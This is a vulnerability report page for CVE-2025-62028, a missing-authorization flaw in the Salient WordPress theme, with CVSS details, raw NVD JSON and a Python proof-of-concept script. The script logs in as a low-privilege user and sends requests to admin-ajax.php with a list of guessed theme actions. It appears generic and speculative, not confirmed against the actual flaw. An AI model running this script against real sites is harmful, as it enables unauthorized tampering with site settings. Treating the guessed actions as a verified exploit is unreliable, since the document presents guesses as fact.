Security Vulnerability Report
中文
CVE-2025-62028 CVSS 4.3 MEDIUM

CVE-2025-62028

Published: 2025-11-06 16:16:09
Last Modified: 2026-04-27 17:16:30

Description

Missing Authorization vulnerability in ThemeNectar Salient salient.This issue affects Salient: from n/a through < 17.4.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Salient < 17.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62028 PoC - Salient Theme Authorization Bypass # Affected: Salient Theme < 17.4.0 # Type: Missing Authorization import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-site.com" USERNAME = "attacker" # Low privilege user account PASSWORD = "password" def get_wordpress_nonce(login_url, session): """Get WordPress nonce for authenticated requests""" resp = session.get(login_url) nonce_start = resp.text.find('id="_wpnonce"') if nonce_start == -1: return None nonce_part = resp.text[nonce_start:nonce_start+100] nonce_start = nonce_part.find('value="') + 7 nonce_end = nonce_part.find('"', nonce_start) return nonce_part[nonce_start:nonce_end] def exploit_authorization_bypass(target_url, username, password): """Exploit CVE-2025-62028 Missing Authorization vulnerability""" session = requests.Session() # Step 1: Authenticate as low privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Exploit missing authorization # Common vulnerable AJAX actions in Salient theme vulnerable_actions = [ 'nectar_get_options', 'nectar_save_options', 'salient_get_post_meta', 'salient_update_theme_options' ] admin_ajax_url = f"{target_url}/wp-admin/admin-ajax.php" for action in vulnerable_actions: exploit_data = { 'action': action, 'nonce': get_wordpress_nonce(f"{target_url}/wp-admin/admin.php?page=nectar_general_options", session) or '' } try: resp = session.post(admin_ajax_url, data=exploit_data, timeout=10) if resp.status_code == 200 and 'error' not in resp.text.lower(): print(f"[+] Exploited action: {action}") print(f"[+] Response: {resp.text[:500]}") return True except Exception as e: continue print("[-] Exploitation attempted, check manually") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_authorization_bypass(TARGET_URL, USERNAME, PASSWORD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62028", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:08.857", "lastModified": "2026-04-27T17:16:30.230", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThemeNectar Salient salient.This issue affects Salient: from n/a through < 17.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/salient/vulnerability/wordpress-salient-theme-17-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}